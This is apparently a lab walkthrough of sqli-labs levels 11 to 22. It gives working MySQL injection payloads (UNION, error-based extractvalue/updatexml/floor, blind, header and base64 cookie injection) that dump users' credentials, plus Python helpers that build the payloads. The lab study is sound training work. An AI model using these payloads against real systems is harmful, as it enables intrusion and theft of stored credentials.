sqli-labs Basic Challenges Less11-22

Summary:

Less-11/12: UNION SELECT
Less-13/14: error-based injection
Less-15/16: blind injection
Less-17: error-based injection through an UPDATE query
Less-18 to 20: intercept the request and modify header/cookie fields
Less-21/22: intercept the request and modify the cookie, which is Base64-encoded

Details:

Less-11 POST-Error Based-Single quotes-String
admin admin //guess a username/password pair: success
admin'-- - //success
admin' union select 1,2-- - //success, so the query returns 2 columns
' union select 1,2-- -	//both columns are displayed on the page
' union select 1,database()-- -	//database name: security
' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
//table names: emails,referers,uagents,users
' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'-- -
//column names: id,username,password
' union select 1,group_concat(id,' ',username,' ',password) from users-- -
//all rows of the users table
Less-12 POST-Error Based-Double quotes-String-with twist
admin admin //success
admin'-- - //fails
admin"-- - //fails with a SQL syntax error
admin")-- -	//success: the value is wrapped in double quotes and parentheses
//intermediate steps omitted; they are the Less-11 payloads with the ") prefix
") union select 1,group_concat(id,' ',username,' ',password) from users-- -
//all rows of the users table
Less-13 Double Injection-Single quotes-String-with twist
admin admin //success, but the page shows no details on success
admin'-- - //fails, and the page shows the error details
admin')-- - //success

Error-based injection, method 1 (extractvalue):

admin') and extractvalue('anything',concat('~',database()))-- - 
//error: XPATH syntax error: '~security'
admin') and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- - 
//error: XPATH syntax error: '~emails,referers,uagents,users'
admin') and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))-- -
//error: XPATH syntax error: '~id,username,password'
admin') and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)))-- -
//error: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

Error-based injection, method 2 (updatexml, same XPATH error):

admin') and updatexml('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)),'anything')-- -

Error-based injection, method 3 (duplicate GROUP BY key from floor(rand()*2)):

') union select count(*),concat(database(),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//error: Duplicate entry 'security0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//error: Duplicate entry 'emails,referers,uagents,users0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//error: Duplicate entry 'id,username,password0' for key 'group_key'
') union select count(*),concat(substring((select group_concat(id,' ',username,' ',password) from users),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
//the first 100 characters of the row data appear in the Duplicate entry error the same way

The collision in method 3 depends on the seeded rand() sequence: rand(14) worked here, but rand(0) is the seed normally used because its sequence is known to collide within the first few rows of any table.
Less-14 POST-Double Injection-Single quotes-String-with twist

Although the title says single quotes, the query actually uses double quotes.

Replace the ') in the previous lesson's payloads with " and they work unchanged.

Less-15 POST-Blind-Boolian/time Based-Single quotes

The page only reports whether the login succeeded or failed; it never shows query results or error text, so the data has to be extracted one yes/no question at a time.

admin'-- -
admin' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1-- -
admin' and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=1-- -
//both forms work

Iterating the compared value with Burp Suite shows that the combined length of the table names is 29 (emails,referers,uagents,users).

admin' and (select substring(group_concat(table_name),1,1) from information_schema.tables where table_schema=database())='a'-- -

Walk the position and the compared character to recover the table names, then the column names and the row data the same way. Note that ='a' is a case-insensitive comparison under MySQL's default collation; compare ascii(substring(...)) against a number (or prefix the string with binary) when case matters.

Less-16 is similar; only the quoting around the value changes.
Less-17 POST-Update Query-Error Based-String

The page is a password-reset form.

An UPDATE statement has the form: update <table> set <column>=<value> where <column>=<value>

So the query here is presumably something like update <table> set password=<value> where username=<value>

admin admin //success
admin' admin //plain error message
admin" admin //plain error message

That seemed odd, so I read the source: the username input is passed through mysqli_real_escape_string, so it cannot be injected here.

The source also looks up the username first and only then updates that user's password, so the username has to be an existing user.

admin admin' //the request goes through, but the page reports a syntax error near 'admin'

Since the error text is visible, error-based injection applies. Keep the username as admin and test the password field:

admin' and extractvalue('anything',concat('~',database()))-- -
//error: XPATH syntax error: '~security'; next, dump the table names
admin' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
//XPATH syntax error: '~emails,referers,uagents,users'; next, the columns
admin' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- -
//XPATH syntax error: '~id,username,password'; next, the row data
admin' and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users)))-- -

This one fails with: You can't specify target table 'users' for update in FROM clause

MySQL refuses to read rows from the table that the same UPDATE statement is modifying.

Work around it by inserting a derived table in the middle: the inner SELECT is evaluated into a temporary result first, so the outer query no longer reads users directly:

admin' and extractvalue('anything',concat('~',(select group_concat(t.id,' ',t.username,' ',t.password) from (select id,username,password from users)t)))-- -

Success: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

The error text shows at most 32 characters, the ~ included, so only the first 31 characters of the data are visible. Read the rest with substring:

admin' and extractvalue('anything',concat('~',substring((select group_concat(t.id,' ',t.username,' ',t.password) from (select id,username,password from users)t),32,32)))-- -

Each such chunk again shows 31 characters after the ~, so advance the offset by 31 each time (32, 63, 94, ...) rather than by 32; stepping 32, 64 silently drops one character at every boundary after the first.
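The 32-character limit and the offset arithmetic above matter for every error-based dump in Less-17 through Less-22, so here is an added example (not from the original writeup) that makes the off-by-one visible. It generates the Less-17 password-field payload for a given offset, models MySQL's truncation of the XPATH error text to 32 characters, and reassembles a constructed sample value both with the 1/32/64 offsets used in the writeup and with a constant stride of 31. The `SECRET` string is made up for the demonstration and only mimics the shape of `group_concat(id,' ',username,' ',password)`.

```python
ERROR_LIMIT = 32  # MySQL shows at most 32 characters of the offending XPath string


def error_payload(offset: int, length: int = ERROR_LIMIT, marker: str = "~") -> str:
    """Less-17 password-field payload, parameterised by the substring offset."""
    inner = ("select group_concat(t.id,' ',t.username,' ',t.password) "
             "from (select id,username,password from users)t")
    return (f"admin' and extractvalue('anything',concat('{marker}',"
            f"substring(({inner}),{offset},{length})))-- -")


def simulated_error(secret: str, offset: int, length: int = ERROR_LIMIT, marker: str = "~") -> str:
    """What the page shows for that payload if the subquery evaluates to `secret`:
    the XPath argument is cut to ERROR_LIMIT characters, marker included."""
    xpath_arg = marker + secret[offset - 1: offset - 1 + length]
    return f"XPATH syntax error: '{xpath_arg[:ERROR_LIMIT]}'"


def visible_data(error_text: str, marker: str = "~") -> str:
    """Strip the error wrapper and the marker, keeping only the leaked characters."""
    leaked = error_text[len("XPATH syntax error: '"):-1]
    return leaked[len(marker):]


def dump(secret: str, offsets) -> str:
    """Concatenate what each offset's error message leaks. Against a live target
    you keep going until the error shows the marker alone."""
    return "".join(visible_data(simulated_error(secret, off)) for off in offsets)


def offsets(stride: int, total_len: int) -> range:
    """1-based substring offsets that cover total_len characters with the given stride."""
    return range(1, total_len + 1, stride)


# Constructed sample value standing in for group_concat(...) over the users table (85 chars).
SECRET = "1 Dumb Dumb,2 Angelina I-kill-you,3 Dummy p@ssword,4 secure crappy,5 stupid stupidity"

if __name__ == "__main__":
    print(error_payload(32))
    print(simulated_error(SECRET, 1))            # same 31-char window the writeup observed
    print(dump(SECRET, [1, 32, 64]))             # the writeup's offsets: character 63 is lost
    print(dump(SECRET, offsets(31, len(SECRET))))  # stride 31 recovers everything
```

With the writeup's offsets the 'a' of "crappy" (character 63) never appears in any chunk; a stride equal to the visible width (32 minus the marker length) is the general rule, whatever marker you choose.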

Less-18 POST-Header Injection-Uagent field-Error based

Reading the source, username and password are sanitized, but the User-Agent and the client IP are inserted unescaped, which gives two injection points:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

This walkthrough tampers with the User-Agent value. The INSERT only runs after a successful login, so submit a valid account (admin/admin).

Configure the browser to use the proxy, intercept the login request in Burp Suite, and replace the User-Agent header with

' and extractvalue('anything',concat('~',database())) and '

(the trailing and ' closes the string literal so the INSERT stays syntactically valid). Then click Forward:

[Image 1]

The browser then shows the error output:

[Image 2]

Next dump the table names, then the columns, then the row data, with the same syntax as the previous lesson:

' and extractvalue('anything',concat('~',(select group_concat(id,' ',username,' ',password) from users))) and '

This gives the first 32 bytes of the output (the ~ plus 31 characters of data).

Less-19 POST-Header Injection-Referer field-Error based

Same as the previous lesson, except the injection point is the Referer header.

In Burp Suite, set the Referer header to:

' and extractvalue('anything',concat('~',database())) and '

Click Forward and the error comes back: XPATH syntax error: '~security'

Then dump the tables, the columns and the row data:

1. table names
' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
//XPATH syntax error: '~emails,referers,uagents,users'
2. column names
' and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '
//XPATH syntax error: '~id,username,password'
3. row data
' and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32))) and '
//XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
//advance the offset by 31 (32, 63, 94, ...) to read the remaining characters; the ~ takes one of the 32 visible characters
Less-20 POST-Cookie Injection-Uname field-Error based

The uname cookie is set after a successful login, so log in first, then intercept a follow-up request in Burp Suite and modify the Cookie header.

uname=admin' and extractvalue('anything',concat('~',database())) and '

Error returned:

Issue with your mysql: XPATH syntax error: '~security'

The steps and the syntax are the same as in the previous lesson.

Going straight to the row data:

uname=admin' and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32))) and '
//error: Issue with your mysql: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
Less-21 Cookie Injection-base64 encoded-single quotes and parenthesis

Reading the source, the cookie value is base64-decoded before it is used in the query, and the query wraps it in single quotes and parentheses:

$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

So build the injected cookie by base64-encoding the value (everything after uname=) of the following:

uname=admin')and extractvalue('anything',concat('~',database()))-- -

which gives:

uname=YWRtaW4nKWFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLGRhdGFiYXNlKCkpKS0tIC0=

Send it in the Cookie header with Burp Suite and the error comes back: Issue with your mysql: XPATH syntax error: '~security'.

One very confusing point: if a space is put between admin') and and when building the payload, it fails:

//with the space:
uname=admin') and extractvalue('anything',concat('~',database()))-- -
//base64-encoded:
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKCdhbnl0aGluZycsY29uY2F0KCd+JyxkYXRhYmFzZSgpKSktLSAt
//error returned:
check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0,1' at line 1

I could not tell whether the Base64 implementation was at fault or what. The likely cause is not base64 itself but the transport: the spaced variant happens to encode to a string containing a '+' (the KCd+Jyx group), and PHP URL-decodes cookie values when it builds $_COOKIE, which turns that '+' into a space. base64_decode() then silently drops the space, every following 6-bit group shifts, and the tail of the payload (including the -- - comment) decodes to garbage, so MySQL complains at the trailing LIMIT 0,1. The no-space variant contains no '+' and survives. Percent-encode the cookie value (+ as %2B, / as %2F, = as %3D) and either form works.
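The following script is an added example, not part of the original writeup, that reproduces the "space breaks it" effect offline and shows the fix. `php_base64_decode` is a model of PHP's non-strict base64_decode() (it drops characters outside the alphabet and tolerates missing padding) and `server_side_uname` models the URL-decoding PHP applies to cookie values before the Less-21 code runs; both are assumptions about the server's behaviour, written here for the demonstration. The two payload strings are the ones from the writeup.

```python
import base64
import string
from urllib.parse import quote, unquote_plus

B64_CHARS = set(string.ascii_letters + string.digits + "+/")

# The two Less-21 cookie payloads: identical except for the space after admin')
NO_SPACE = "admin')and extractvalue('anything',concat('~',database()))-- -"
WITH_SPACE = "admin') and extractvalue('anything',concat('~',database()))-- -"


def raw_base64(payload: str) -> str:
    """Plain base64, as an online encoder or `echo -n ... | base64` produces it."""
    return base64.b64encode(payload.encode()).decode()


def php_base64_decode(s: str) -> bytes:
    """Model of PHP's non-strict base64_decode(): characters outside the alphabet
    are silently dropped and missing '=' padding is tolerated. Dropping one
    character shifts every following 6-bit group, so the tail becomes garbage."""
    kept = "".join(ch for ch in s if ch in B64_CHARS)
    kept += "=" * (-len(kept) % 4)
    return base64.b64decode(kept)


def server_side_uname(cookie_value: str) -> str:
    """What the Less-21 script sees: PHP URL-decodes cookie values into $_COOKIE
    ('+' becomes a space, %XX is expanded), then the script base64-decodes."""
    return php_base64_decode(unquote_plus(cookie_value)).decode("latin-1")


def build_query(uname: str) -> str:
    """The query from the Less-21 source with the decoded cookie spliced in."""
    return f"SELECT * FROM users WHERE username=('{uname}') LIMIT 0,1"


def cookie_safe_base64(payload: str) -> str:
    """Base64-encode, then percent-encode so '+', '/' and '=' survive URL decoding."""
    return quote(raw_base64(payload), safe="")


if __name__ == "__main__":
    for name, payload in (("no space", NO_SPACE), ("with space", WITH_SPACE)):
        encoded = raw_base64(payload)
        print(f"{name}: contains '+' = {'+' in encoded}")
        print("  server sees:", build_query(server_side_uname(encoded)))
    print("fixed:", build_query(server_side_uname(cookie_safe_base64(WITH_SPACE))))
```

The same check applies to Less-22: before pasting a base64 cookie into Burp, look for '+', '/' or '=' in it, or always percent-encode it as `cookie_safe_base64` does.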

Next come the table names, the column names and the row data as before; only the row-data payload is shown here:

uname=admin')and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32)))-- -
//base64-encoded
uname=YWRtaW4nKWFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwnICcsdXNlcm5hbWUsJyAnLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwxLDMyKSkpLS0gLQ==
//error returned: Issue with your mysql: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
Less-22 Cookie Injection-base64 encoded-double quotes

Ignoring the hint in the title and probing the cookie step by step (each payload is followed by its base64 encoding):

1. admin'  (YWRtaW4n)
//Issue with your mysql: Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,COERCIBLE) for operation '='
2. admin"  (YWRtaW4i)
//check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" LIMIT 0,1' at line 1
//so the value is wrapped in double quotes
3. comment out the trailing double quote
admin"-- -  (YWRtaW4iLS0gLQ==)
//normal page: the injection works
4. error-based injection, database name
admin" and extractvalue('anything',concat('~',database()))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLGRhdGFiYXNlKCkpKS0tIC0=
//error: Issue with your mysql: XPATH syntax error: '~security'
5. all table names (remember the parentheses around the select)
admin" and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSkpKS0tIC0=
//XPATH syntax error: '~emails,referers,uagents,users'
6. all column names
admin" and extractvalue('anything',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJykpKS0tIC0=
//XPATH syntax error: '~id,username,password'
7. first 32 characters of the row data
admin" and extractvalue('anything',concat('~',substring((select group_concat(id,' ',username,' ',password) from users),1,32)))-- -
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoJ2FueXRoaW5nJyxjb25jYXQoJ34nLHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwnICcsdXNlcm5hbWUsJyAnLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwxLDMyKSkpLS0gLQ==
//error: XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
